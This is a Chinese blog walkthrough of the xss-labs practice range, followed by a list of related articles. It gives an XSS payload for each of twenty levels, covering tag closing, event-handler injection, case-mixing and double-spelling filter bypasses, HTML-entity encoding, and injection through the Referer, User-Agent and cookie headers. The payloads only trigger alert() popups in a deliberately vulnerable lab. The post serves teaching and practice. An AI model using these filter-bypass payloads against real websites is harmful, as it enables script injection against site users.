xss-labs靶场通关详解

已于 2024-08-28 18:35:22 修改
阅读量749 收藏 5
点赞数 18
文章标签: xss 前端
于 2024-08-23 18:18:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shw_yzh/article/details/141471442
版权

第一关

步骤一:查看网站源码,可以发现get传参name的值test插入了html里头

步骤二:name后输入<script>alert()</script>

第二关

步骤一:搜索框输入<script>alert()</script>没有成功

步骤二:查看源码,输入的<script>alert()</script>在<input>标签的value中,需要">闭合

步骤三,搜索框输入"><script>alert()</script>

第三关

步骤一:先输入<script>alert()</script>,查看网页源代码

发现符号被实体化了

步骤二:利用onfocus事件绕过,输入框输入' οnfοcus=javascript:alert() ',再点击输入框

第四关

步骤一:输入<script>alert()</script>,查看源代码,发现符号也被实体化了

步骤二:利用onfocus事件绕过,双引号闭合,输入框输入" οnfοcus=javascript:alert() ",再点击输入框

第五关

步骤一:先输入" οnfοcus=javascript:alert() "尝试,查看源代码

步骤二:发现对事件on做了过滤,在他们中间加了_,尝试用a标签的href 属性来构造payload,输入"><a href='javascript:alert(123);'>点击我</a>,点击"点击我"

第六关

步骤一:先输入" οnfοcus=javascript:alert() "尝试,查看源代码

发现对事件on做了过滤,在他们中间加了_,

步骤二:尝试用a标签的href 属性来构造payload,输入"><a href='javascript:alert(123);'>点击我</a>,查看源代码

发现href做了过滤

步骤三:尝试大小写混合绕过,href大写试一试,点击“点击我”

第七关

步骤一:输入关键字" OnFocus <sCriPt> <a hReF=javascript:alert()>,查看网页源代码

传进去的值,经过转化后变成了

" focus <> <a =java:alert()>

步骤二:采用双拼写绕过"><scscriptript>alert()</scscriptript>

第八关

步骤一:输入javascript:alert()查看网页源码

步骤二:在线Unicode编码解码编码绕过

步骤三:输入&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41; 点击友情链接

第九关

步骤一:输入javascript:alert()查看网页源码

步骤三:输入&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;/* http:// */点击友情链接

第十关

步骤一:Get传参的值,只插入了h2标签里头,下面的input标签,隐藏掉了

步骤二:查看这关源码

get传参t_sort,并过滤掉了<>号,不能闭合插入标签,但是我们还能用onfocus事件,因为这里输入框被隐藏了,需要添加type="text"

步骤三:get传参,输入?t_sort=" οnfοcus=javascript:alert() type="text,点击输入框

第十一关

步骤一:查看网页源代码,有4个隐藏的输入框

步骤二:刷新抓包

步骤三:Referer中改为:" οnfοcus=javascript:alert() type="text

步骤四:放行,隐藏框出现,点击弹窗

第十二关

步骤一:查看网页源代码,第四个隐藏输入框为t_ua,是User-Agent头传值

步骤二:刷新抓包

步骤三:User-Agent中改为:" οnfοcus=javascript:alert() type="text

步骤四:放行,隐藏框出现,点击弹窗

第十三关

步骤一:查看网页源代码,第四个隐藏输入框为t_cook,是cookie传值

步骤二:F12查看cookie,user后面改为:" οnclick=alert() type="text

步骤三:刷新页面,隐藏框出现,点击

第十四关

网站已挂

第十五关

步骤一:查看页面源代码

ng-include指令就是文件包涵的意思,用来包涵外部的html文件,如果包涵的内容是地址,需要加引号

步骤二:尝试包含第一关

网站卡住动不了了

第十六关

步骤一:页面php?后面输入keyword=<script>alert(1)</script>,查看页面源代码

步骤二:script关键字,空格和/都进行了编码,页面php?后面输入keyword=<img%0asrc=”111”%0aοnerrοr=alert(1)>

第十七关

步骤一:查看源码,传入了两个值,分别作为src中的xsf01.swf的变量和值传入

说明这里就是可以弹窗的地方

步骤二:页面输入οnmοuseοver=alert("1"),鼠标移到不支持此插件上

第十八关

步骤一:查看源码,传入了两个值,分别作为src中的xsf02.swf的变量和值传入

说明这里就是可以弹窗的地方

步骤二:页面输入οnmοuseοver=alert("1"),鼠标移到不支持此插件上

第十九关

步骤一:页面输入php?arg01=version&arg02=<a href="javascript:alert(/xss/)">xss</a>,点击xss

第二十关

步骤一:页面输入php?arg01=id&arg02=xss\"))}catch(e){alert(/xss/)}//%26width=123%26height=123

青衫木牛马
关注
xss-labs 通关教程
SkyWT 的博客
07-05 2007
XSS 攻击历久弥新,目前 XSS 漏洞依然广泛存在。其核心在于找到注入点并通过 payload 让浏览器执行 js 代码。注入点不仅可以来源于用户提供的文本(请求参数或后端存储的字段),也可以是 Referer、UA、Cookie 等。通过<script>标签。通过元素的 onmouseover 属性。通过<img>的 onerror 属性,如。通过 URI,如。一般来说,使用 PHP 的函数能够防御很大一部分 XSS(注意过滤单引号)。许多字符过滤上的漏洞都是没有使用。
xss-labs通关详解 Level 6-10
qq_41755084的博客
10-25 1025
这一关整体上与第五关类似,只是黑名单的量增加了,尝试了href、src等字段,都被替换掉了。不过这个黑名单是大小写敏感的,而在html语句中,大小写不敏感。我们可以使用大小写字段进行绕过。构造注入代码从keyword参数处传入。将href的f大写,变为hreF,绕过黑名单,页面上成功插入了标签。点击该标签,成功弹窗。
XSS-labs靶场通关
最新发布
weixin_70292186的博客
05-08 1056
首先说一下embed标签,可以理解为定义了一个区域,可以把html文档、图片、视频、音频等内容内嵌到当前页面,这关浏览器不支持flash插件,所以图片显示不出来,如果感觉别扭,就在后端把。里面的链接失效了,这关跳过,不过提一句,这关涉及到了exif漏洞,原理是有些网站有读取图片exif信息的功能,当网站读取到的恶意的exif信息就会触发属性中的。发现有的转义,还在script中间加了下划线_,接着尝试闭合,同样存在闭合和转义,所以利用a标签的href来闭合。的,所以加个type="text"
XSS漏洞:xss-labs靶场通关
qq_68163788的博客
01-16 2846
xss-lab是一个旨在帮助安全研究人员、开发人员和安全爱好者学习和理解跨站脚本攻击(XSS)的项目。它通常包括一系列设计精良的实验室环境,用于模拟真实世界中可能遇到的XSS漏洞场景。这些实验室环境通常包括各种不同类型和难度级别的XSS漏洞,以帮助学习者逐步提高他们的技能。 通过xss-lab项目,用户可以学习如何利用XSS漏洞来攻击网站、窃取用户信息、执行恶意代码等。同时,用户也可以学习如何防御和修复这些漏洞,从而提高网站的安全性。 xss-lab项目的目的是通过实践操作的方式来加深对XSS攻击的理解
xss-labs靶场通关
m0_52051132的博客
10-15 1671
在这里关于 如何搭建靶场的就不再赘述了,可以在本地用phpstudy来搭建的。建议使用火狐浏 览器,访问http://ip/xss-labs点击图片开始你的xss之旅吧!
XSS-labs通关
em.....
10-24 4305
XSS-labs通关 1.第一关 payload: http://xss/level1.php?name=<Script>alert(1)</Script> 2.第二关 这里变量出现在两处,我们直接利用第二处,做构造以及闭合 payload: 1"><ScRipt>alert(1)</ScRipt> 3.第三关 ​ ​ 用第二关的payload去试一下,发现内容没变化,但是就是没当成js代码 ​ 查一下网页源代码和php代码 ​ 看
xss-labs-master.zip(xss注入通关游戏/靶场
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
XSS-labs通关教程(1-5):
snowlyzz的博客
03-12 5556
比较新手向的XSS反射型靶场,比较基础。
攻防系列——pikachu靶场通关练习
weixin_43140411的博客
10-23 2057
从来没有哪个时代的黑客像今天一样热衷于猜解密码 ---奥斯特洛夫斯基
xss-labs通关.pdf
04-20
xss-labs靶场20关全通关攻略
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-21 5589
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
xss-labs靶场实战全通关详细过程(xss靶场详解
热门推荐
金 帛的博客
07-13 3万+
xss靶场一到二十关通关详细教程
xss-labs靶场训练(1~4关)
ldzhhh的博客
05-16 554
第一关 前端F12查看代码: 这里只能看到参数test输出在h2里面,可以尝试直接构造payload: <script>alert(/xss/)</script> 成功! 后台关键源码: <?php ini_set("display_errors", 0); $str = $_GET["name"]; echo "<h2 align=center>欢迎用户".$str."</h2>"; ?> 这里是以GET方法获取参数name,并直接输出
xsslabs靶场通关(持续更新)
m0_72286569的博客
03-14 2166
本篇文章将介绍在xsslabs这个靶场中每一个关卡的详细通关策略,若有瑕疵还望客官多多担待。
xss-labs靶场通关
m0_70349048的博客
02-27 1330
我们发现,当我们更改name等于不同的值时,有不同的返回结果,因此在这里可能有xss漏洞然后直接进行测试,在name后面加入xss攻击语句。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值